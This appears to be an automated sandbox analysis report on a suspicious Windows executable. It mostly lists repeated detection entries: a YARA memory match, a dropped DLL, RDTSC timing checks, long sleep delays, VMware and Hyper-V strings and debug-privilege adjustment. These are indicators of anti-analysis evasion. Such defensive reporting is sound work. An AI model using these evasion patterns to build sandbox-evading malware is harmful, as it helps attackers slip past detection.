            Source: 6mGpn6kupm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.1714407995.00000000051B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_701C1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_701C1B5F
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CA1DB5 push ds; retf 6134h5_2_34CA205E
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_34CA2063 push ds; retf 0034h5_2_34CA2066
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeFile created: C:\Users\user\AppData\Local\Temp\nsvC041.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeAPI/Special instruction interceptor: Address: 5767EC9
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeAPI/Special instruction interceptor: Address: 3BC7EC9
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeRDTSC instruction interceptor: First address: 572CB38 second address: 572CB38 instructions: 0x00000000 rdtsc 0x00000002 test ecx, edx 0x00000004 test ecx, edx 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FFB1076DC1Fh 0x0000000a cmp bh, ah 0x0000000c test dl, 0000002Ch 0x0000000f inc ebp 0x00000010 test edx, ecx 0x00000012 inc ebx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeRDTSC instruction interceptor: First address: 3B8CB38 second address: 3B8CB38 instructions: 0x00000000 rdtsc 0x00000002 test ecx, edx 0x00000004 test ecx, edx 0x00000006 cmp ebx, ecx 0x00000008 jc 00007FFB10F7A66Fh 0x0000000a cmp bh, ah 0x0000000c test dl, 0000002Ch 0x0000000f inc ebp 0x00000010 test edx, ecx 0x00000012 inc ebx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeMemory allocated: 34D60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeMemory allocated: 349B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598997Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598015Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597797Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597687Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597578Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597250Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597140Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597031Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596812Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596703Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596594Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596375Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596266Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596047Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595937Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595828Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595719Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595500Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595391Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeWindow / User API: threadDelayed 1240Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeWindow / User API: threadDelayed 8612Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvC041.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeAPI coverage: 3.4 %
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -27670116110564310s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 748Thread sleep count: 1240 > 30Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 748Thread sleep count: 8612 > 30Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -598997s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -598890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -598672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -598234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -598125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -598015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -597906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -597797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -597687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -597578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -597469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -597359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -597250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -597140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -597031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -596922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -596812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -596703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -596594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -596484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -596375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -596266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -596156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -596047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -595937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -595828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -595719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -595609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -595500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -595391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -595281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -595172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -595062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -594953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -594844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -594734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exe TID: 1840Thread sleep time: -594625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_0040672B FindFirstFileW,FindClose,5_2_0040672B
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 5_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405AFA
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598997Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 598015Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597797Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597687Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597578Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597250Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597140Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 597031Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596812Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596703Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596594Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596375Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596266Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 596047Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595937Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595828Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595719Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595500Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595391Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeThread delayed: delay time: 594625Jump to behavior
            Source: 6mGpn6kupm.exe, 00000000.00000002.1713367540.0000000000588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA#
            Source: 6mGpn6kupm.exe, 00000005.00000002.2541418618.0000000004737000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh y
            Source: 6mGpn6kupm.exe, 00000005.00000002.2541418618.000000000478E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeAPI call chain: ExitProcess graph end nodegraph_0-4554
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeAPI call chain: ExitProcess graph end nodegraph_0-4711
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeCode function: 0_2_701C1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_701C1B5F
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeProcess created: C:\Users\user\Desktop\6mGpn6kupm.exe "C:\Users\user\Desktop\6mGpn6kupm.exe"Jump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeQueries volume information: C:\Users\user\Desktop\6mGpn6kupm.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\6mGpn6kupm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
